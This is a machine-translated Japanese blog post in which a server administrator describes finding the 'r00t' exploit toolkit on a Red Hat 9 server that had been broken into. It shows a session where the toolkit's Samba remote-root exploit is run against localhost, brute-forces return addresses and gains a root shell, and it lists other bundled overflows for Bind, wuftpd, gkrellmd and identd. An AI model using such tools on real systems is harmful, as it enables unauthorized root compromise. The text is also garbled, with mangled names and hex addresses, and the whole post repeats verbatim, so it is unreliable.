デフォルトのSambaバージョンはRedHat 9でオーバーフローします。rootプレゼンテーションを取得します。
3158 ワード
最近の黒サーバーのセキュリティ分析から、このユーザーの権限を高めるツールを見つけました。彼はSambaのセキュリティ・ホールを利用してROOTに昇進した。
ここ数日サーバーは公ネットワークテストのためにSambaサーバーをインストールしました。その結果、翌日にサーバーが黒くなっていることが分かりました。
SambaはRedhatにあります Linux 9でデフォルトのバージョンです。このハッカーを使った強力なexploilツールはrootにアップグレードされました。
rootに上げるには3秒しかかかりません。
自分で汗をかきなさい
サーバーのtmpからx 2 k 3のディレクトリを探します。
[bob@learnin9 tmp; cd x 2 k 3/
[bob@learnin9 x 2 k 3\$ ls
ビッド ftp gkr identd r 00 t samba
[bob@learnin9 x 2 k 3\$
ビッド ftp gkr identd sambaはすべてディレクトリです。r 00 tはプログラムです。r 00 tプログラムの実行状況を見てみましょう。
[bob@learnin9 x 2 k 3\$ ./r 00 t
.-----------------------
𞓜 x 2 k 3 /
𞓜 Written by Natok /
+------------------------
𞓜 Target: [1) Samba | <= 2.8
𞓜 [2) Bind | 8.3.2 / 8.3.3 / 9.2.1
𞓜 [3) gkrellmd | <2.1.12
𞓜 [4) wuftpd | <=2.6.1
𞓜 [5) identd | 1.2
+------------------------
𞓜 http://www.natok.de /
|命______________________u_呸
./r 00 t
[bob@learnin9 x 2 k 3\$ ./r 00 t 127.1.0.1 1
[*] Range ト scan : 127..0
[*] ソケット Connecting ト ポーター : 139
[*] プレス control+c for skyipping !
ポート 139 IP 127..0 -> Connection refused
ポート 139 IP 127.1.0.1 -> Connection ok
[+] Let sploit ;-)
samb a-2.8 < remote root exploid by e SDee (wwww.netric.org|be)
-----------------------------------------
+ Ver.bose mode.
+ Bruteforce mode. (Linux
+ Host is ルニーニング samba.
+ Using レイト: [0 xbffffed 4]
+ Using レイト: [0 xbffffda 8]
+ Using レイト: [0 xbffffic 7 c]
+ Using レイト: [0 xbffffb 50]
+ Using レイト: [0 xbffffa 24]
+ Using レイト: [0 xbff8 f 8]
+ Using レイト: [0 xbffff 7 cc」
+ Using レイト: [0 xbffffa 6 a 0]
+ Using レイト: [0 xbffff 574]
+ Using レイト: [0 xbffff 448]
+ Using レイト: [0 xbffff 31 c]
+ Using レイト: [0 xbfff 1 f 0]
+ Using レイト: [0 xbff0 c 4]
+ Using レイト: [0 xbfffef 98]
+ Using レイト: [0 xbfffee 6 c]
+ Using レイト: [0 xbfffed 40]
+ Using レイト: [0 xbfffec 14]
+ Using レイト: [0 xbfffeae 8]
+ Using レイト: [0 xbfffe 9 bc]
+ Using レイト: [0 xbfffe 890]
+ Using レイト: [0 xbfffe 764]
+ Using レイト: [0 xbfffe 638]
+ Using レイト: [0 xbfffe 50 c]
+ Using レイト: [0 xbfffe 3 e 0]
+ Using レイト: [0 xbfffe 2 b 4]
+ Using レイト: [0 xbfffe 188]
+ Worket
-----------------------------------------
**** JE。 MOET JE。 MUIL HOUWE
Linux learnin 9 2.4.2-8 #1 Thu マルマ 13 17:54:28 EST 2003 i 686 i 686 i 386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
id。
uid=0(root) gid=0(root) groups=99(nobody)
見ましたよね。そう簡単にrootに奪われました。
私はこれはlocal host方式だけです。実は長距離も同じです。直接にrootに獲得しました。
みなさん、自分のRedhatをよく見てください。 9でしょう。rpm -qa。 |grep ***** 汗はもう出ましたか?
そしてビッド gkrellmd wuftpd identdこれらのオーバーフロープログラム。これらのプログラムはハッカー界に属していますか?公表されていないオーバーフロープログラムです。ふふっ!
私のサーバーはBind、gkrellmd、wu_を起動していません。ftpd 、identdはデフォルトでインストールされたsambaだけを起動しました。また、ネット上にいます。だから、そのハッカーは私のサーバーに当たって侵入しました。おめでとうございます。私もついにこんないいものを見つけました。
自分で喜んでください。行ってみましたhttp://www.natok.de/ 中国語のサイトだと気づきましたが、中には誰が入っていますか?気になります
r 00 tプログラムはNatokで書いたと言えますが、exploidプログラムは彼が書いたのではなく、他のオーバーフロープログラムを分類しただけです。友好的なインターフェイスをしましたが、収集できるのはやはりとても強いです。
この男と知り合いになりたいです。
ここ数日サーバーは公ネットワークテストのためにSambaサーバーをインストールしました。その結果、翌日にサーバーが黒くなっていることが分かりました。
SambaはRedhatにあります Linux 9でデフォルトのバージョンです。このハッカーを使った強力なexploilツールはrootにアップグレードされました。
rootに上げるには3秒しかかかりません。
自分で汗をかきなさい
サーバーのtmpからx 2 k 3のディレクトリを探します。
[bob@learnin9 tmp; cd x 2 k 3/
[bob@learnin9 x 2 k 3\$ ls
ビッド ftp gkr identd r 00 t samba
[bob@learnin9 x 2 k 3\$
ビッド ftp gkr identd sambaはすべてディレクトリです。r 00 tはプログラムです。r 00 tプログラムの実行状況を見てみましょう。
[bob@learnin9 x 2 k 3\$ ./r 00 t
.-----------------------
𞓜 x 2 k 3 /
𞓜 Written by Natok /
+------------------------
𞓜 Target: [1) Samba | <= 2.8
𞓜 [2) Bind | 8.3.2 / 8.3.3 / 9.2.1
𞓜 [3) gkrellmd | <2.1.12
𞓜 [4) wuftpd | <=2.6.1
𞓜 [5) identd | 1.2
+------------------------
𞓜 http://www.natok.de /
|命______________________u_呸
./r 00 t
[bob@learnin9 x 2 k 3\$ ./r 00 t 127.1.0.1 1
[*] Range ト scan : 127..0
[*] ソケット Connecting ト ポーター : 139
[*] プレス control+c for skyipping !
ポート 139 IP 127..0 -> Connection refused
ポート 139 IP 127.1.0.1 -> Connection ok
[+] Let sploit ;-)
samb a-2.8 < remote root exploid by e SDee (wwww.netric.org|be)
-----------------------------------------
+ Ver.bose mode.
+ Bruteforce mode. (Linux
+ Host is ルニーニング samba.
+ Using レイト: [0 xbffffed 4]
+ Using レイト: [0 xbffffda 8]
+ Using レイト: [0 xbffffic 7 c]
+ Using レイト: [0 xbffffb 50]
+ Using レイト: [0 xbffffa 24]
+ Using レイト: [0 xbff8 f 8]
+ Using レイト: [0 xbffff 7 cc」
+ Using レイト: [0 xbffffa 6 a 0]
+ Using レイト: [0 xbffff 574]
+ Using レイト: [0 xbffff 448]
+ Using レイト: [0 xbffff 31 c]
+ Using レイト: [0 xbfff 1 f 0]
+ Using レイト: [0 xbff0 c 4]
+ Using レイト: [0 xbfffef 98]
+ Using レイト: [0 xbfffee 6 c]
+ Using レイト: [0 xbfffed 40]
+ Using レイト: [0 xbfffec 14]
+ Using レイト: [0 xbfffeae 8]
+ Using レイト: [0 xbfffe 9 bc]
+ Using レイト: [0 xbfffe 890]
+ Using レイト: [0 xbfffe 764]
+ Using レイト: [0 xbfffe 638]
+ Using レイト: [0 xbfffe 50 c]
+ Using レイト: [0 xbfffe 3 e 0]
+ Using レイト: [0 xbfffe 2 b 4]
+ Using レイト: [0 xbfffe 188]
+ Worket
-----------------------------------------
**** JE。 MOET JE。 MUIL HOUWE
Linux learnin 9 2.4.2-8 #1 Thu マルマ 13 17:54:28 EST 2003 i 686 i 686 i 386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
id。
uid=0(root) gid=0(root) groups=99(nobody)
見ましたよね。そう簡単にrootに奪われました。
私はこれはlocal host方式だけです。実は長距離も同じです。直接にrootに獲得しました。
みなさん、自分のRedhatをよく見てください。 9でしょう。rpm -qa。 |grep ***** 汗はもう出ましたか?
そしてビッド gkrellmd wuftpd identdこれらのオーバーフロープログラム。これらのプログラムはハッカー界に属していますか?公表されていないオーバーフロープログラムです。ふふっ!
私のサーバーはBind、gkrellmd、wu_を起動していません。ftpd 、identdはデフォルトでインストールされたsambaだけを起動しました。また、ネット上にいます。だから、そのハッカーは私のサーバーに当たって侵入しました。おめでとうございます。私もついにこんないいものを見つけました。
自分で喜んでください。行ってみましたhttp://www.natok.de/ 中国語のサイトだと気づきましたが、中には誰が入っていますか?気になります
r 00 tプログラムはNatokで書いたと言えますが、exploidプログラムは彼が書いたのではなく、他のオーバーフロープログラムを分類しただけです。友好的なインターフェイスをしましたが、収集できるのはやはりとても強いです。
この男と知り合いになりたいです。